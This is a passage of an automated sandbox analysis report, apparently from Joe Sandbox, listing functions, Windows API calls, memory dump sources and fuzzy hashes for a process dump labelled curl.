                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorLastThread
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1689873465-0
                                                                                                                                                                    • Opcode ID: 54366ea87b37c8d9439bded496bc2879308014a55219d34f8079e77a1e6785f2
                                                                                                                                                                    • Instruction ID: e93e0ab317602f740a8cb01cf42ad40d1d538d8ca17ecadd61105e065dbfe9cc
                                                                                                                                                                    • Opcode Fuzzy Hash: 54366ea87b37c8d9439bded496bc2879308014a55219d34f8079e77a1e6785f2
                                                                                                                                                                    • Instruction Fuzzy Hash: C9112B72525B066FDB20EF68EC45F9B7BA8EF457B0B10861DFD04C6151DB31D9218B60
                                                                                                                                                                    Function 001D0E80 Relevance: 3.0, APIs: 2, Instructions: 41networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CleanupFreeLibrary
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 470324515-0
                                                                                                                                                                    • Opcode ID: 40725f82d706f90cb452e765e34cee7ad3e4ae62f7797b24bda252b131881008
                                                                                                                                                                    • Instruction ID: 0bcd512b8f5f9ddd805de84f1ece7ff68b0d5ed246a72d664b9f5d10cd96dea3
                                                                                                                                                                    • Opcode Fuzzy Hash: 40725f82d706f90cb452e765e34cee7ad3e4ae62f7797b24bda252b131881008
                                                                                                                                                                    • Instruction Fuzzy Hash: 22011AB06056418BE763DF2AEC593563BDCA71E348F44CA1AD940823B1EFF49905CB62
                                                                                                                                                                    Function 001D0D80 Relevance: 3.0, APIs: 2, Instructions: 34networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WSAStartup.WS2_32(00000202,7F6B3500), ref: 001D0DA3
                                                                                                                                                                    • WSACleanup.WS2_32 ref: 001D0DD2
                                                                                                                                                                      • Part of subcall function 001E1CE0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 001E1D3F
                                                                                                                                                                      • Part of subcall function 001E1CE0: VerSetConditionMask.KERNEL32(00000000,00000000,00000008,00000001), ref: 001E1D4D
                                                                                                                                                                      • Part of subcall function 001E1CE0: VerifyVersionInfoA.KERNEL32(?,00000002,00000000), ref: 001E1D64
                                                                                                                                                                      • Part of subcall function 001E1CE0: VerifyVersionInfoA.KERNEL32(?,00000008,00000000,?), ref: 001E1D76
                                                                                                                                                                      • Part of subcall function 001E1CE0: LoadLibraryA.KERNELBASE(secur32.dll), ref: 001E1D88
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ConditionInfoMaskVerifyVersion$CleanupLibraryLoadStartup
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1807246684-0
                                                                                                                                                                    • Opcode ID: 8c54601505fa9ff8412df4a997dec515f4645ef8c743884aa2eb3b053036f936
                                                                                                                                                                    • Instruction ID: f639c15dad70547b2f8ff854775986cacf3580113854d5f815da5fbd943f31bc
                                                                                                                                                                    • Opcode Fuzzy Hash: 8c54601505fa9ff8412df4a997dec515f4645ef8c743884aa2eb3b053036f936
                                                                                                                                                                    • Instruction Fuzzy Hash: 60F054306556484BD730BBA89C5BBBE739DDB55314F80061BE89AD7282EB30A811CB93
                                                                                                                                                                    Function 002D7042 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringEx.KERNELBASE(00000000,00D51038,00000000,?,?,002D8621,00000000,00000000,00000000,?,002D8621,?,?,00000000,00D51038,00000000), ref: 002D7069
                                                                                                                                                                    • CompareStringW.KERNEL32(00000000,00D51038,00000000,?,?,002D8621,?,002D8621,?,?,00000000,00D51038,00000000,00000000,?,002D869B), ref: 002D7086
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1825529933-0
                                                                                                                                                                    • Opcode ID: 6ff4b713e36c6b587de3f3fbfd92c155bda8ca05064eb4dbc1a77ca23c0a5284
                                                                                                                                                                    • Instruction ID: 6b119f80dce7daed20205e147be93a6d928693a4309aa8bd431358f9c51f7f29
                                                                                                                                                                    • Opcode Fuzzy Hash: 6ff4b713e36c6b587de3f3fbfd92c155bda8ca05064eb4dbc1a77ca23c0a5284
                                                                                                                                                                    • Instruction Fuzzy Hash: 3CF07F3201010EBFDF069F90EC0ACEA3F6AFB08350F008106FA1845131E776E971ABA0
                                                                                                                                                                    Function 002089D0 Relevance: 3.0, APIs: 2, Instructions: 23networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • socket.WS2_32(00000017,00000002,00000000), ref: 002089E1
                                                                                                                                                                    • closesocket.WS2_32(00000000), ref: 00208A07
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: closesocketsocket
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2760038618-0
                                                                                                                                                                    • Opcode ID: 9240d065a1c92fd710a00660a8bb0f4f31786622c50f27e492daf8da03d297a0
                                                                                                                                                                    • Instruction ID: 0d7673e2dc06fc6650418d1f6aa217cec985e2b8a9a8e2abd821e5e222ba743d
                                                                                                                                                                    • Opcode Fuzzy Hash: 9240d065a1c92fd710a00660a8bb0f4f31786622c50f27e492daf8da03d297a0
                                                                                                                                                                    • Instruction Fuzzy Hash: 10E01230A0260157DB1DDB34AD197A9765A9B09360F10C319A517D51F1CB60C8019E11
                                                                                                                                                                    Function 002BE832 Relevance: 3.0, APIs: 2, Instructions: 21memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,002C5D32,00000000,002DA609,00000001,00000000), ref: 002BE846
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,002C5D32,00000000,002DA609,00000001,00000000), ref: 002BE858
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                    • Opcode ID: 7fecd9de61ab1dd95af9dad7d64dd8a71da454a5809821cacf790b68dc49dc14
                                                                                                                                                                    • Instruction ID: caf7ec07938280c23d53a42410bf7b1d6bc7628bbf60b6a495707687fcbec365
                                                                                                                                                                    • Opcode Fuzzy Hash: 7fecd9de61ab1dd95af9dad7d64dd8a71da454a5809821cacf790b68dc49dc14
                                                                                                                                                                    • Instruction Fuzzy Hash: FCE08C71440A05AADF112FB5FC0CBD83BACEB10382F118029F50889060D6708860CB94
                                                                                                                                                                    Function 002CC0BD Relevance: 2.6, APIs: 2, Instructions: 60COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000,001C5539,00000000,?,002CF88C,001C5539,?,?,?,?,?,?,?,001C5539,00000000,00000109), ref: 002CC10D
                                                                                                                                                                    • GetLastError.KERNEL32(?,002CF88C,001C5539,?,?,?,?,?,?,?,001C5539,00000000,00000109), ref: 002CC117
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 918212764-0
                                                                                                                                                                    • Opcode ID: ef402365d7681604a3148aee8ae390e89bf4cd017227c76250259f634c7d382f
                                                                                                                                                                    • Instruction ID: e1e87bd3b349bab4064b78076b75bb5d4152d7257feabe1037f70603ed6b761a
                                                                                                                                                                    • Opcode Fuzzy Hash: ef402365d7681604a3148aee8ae390e89bf4cd017227c76250259f634c7d382f
                                                                                                                                                                    • Instruction Fuzzy Hash: A9014432A3916156C6249AB9A889F6D2B485B82B78F39030DE91CC72C3DAB18C6045D0
                                                                                                                                                                    Function 002C6FD1 Relevance: 1.7, APIs: 1, Instructions: 245COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 002D65B9: IsValidCodePage.KERNEL32(00000000,?,?,00000055,?,?,002C7125,?,?,?,?,00000004,?,00000000), ref: 002D6697
                                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,00000004,?,00000000), ref: 002C71B7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CodePageValid
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1911128615-0
                                                                                                                                                                    • Opcode ID: 4dc8888e0f104a2efce07be8926ec052286a2a0ecfc8bf4d91c25ff0e5ce2577
                                                                                                                                                                    • Instruction ID: 0a13d4777f850b3a6cd0a36d7962988dd3d44898285c6f0d34ba2ef8b5340c77
                                                                                                                                                                    • Opcode Fuzzy Hash: 4dc8888e0f104a2efce07be8926ec052286a2a0ecfc8bf4d91c25ff0e5ce2577
                                                                                                                                                                    • Instruction Fuzzy Hash: 3871A1719242565BEB21AF21CC41FEF77BDEF55310F0401AAFD09A6241EA709E60CFA1
                                                                                                                                                                    Function 002C259D Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCommandLineA.KERNEL32(00307AE0,00000014), ref: 002C2635
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CommandLine
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3253501508-0
                                                                                                                                                                    • Opcode ID: ff39015fe998f0be4ace9e22d9c0b38a79dc8e41f7d4d141912ae11f033cd113
                                                                                                                                                                    • Instruction ID: 997bd16df447e9b4a54be852e62695c724581fc9a43d2861d967202524f8a104
                                                                                                                                                                    • Opcode Fuzzy Hash: ff39015fe998f0be4ace9e22d9c0b38a79dc8e41f7d4d141912ae11f033cd113
                                                                                                                                                                    • Instruction Fuzzy Hash: 92213770A34701CADB11BBB89C56F2A32586B10384F61432DF505C61D3EFF0C8B49E65
                                                                                                                                                                    Function 001DE580 Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
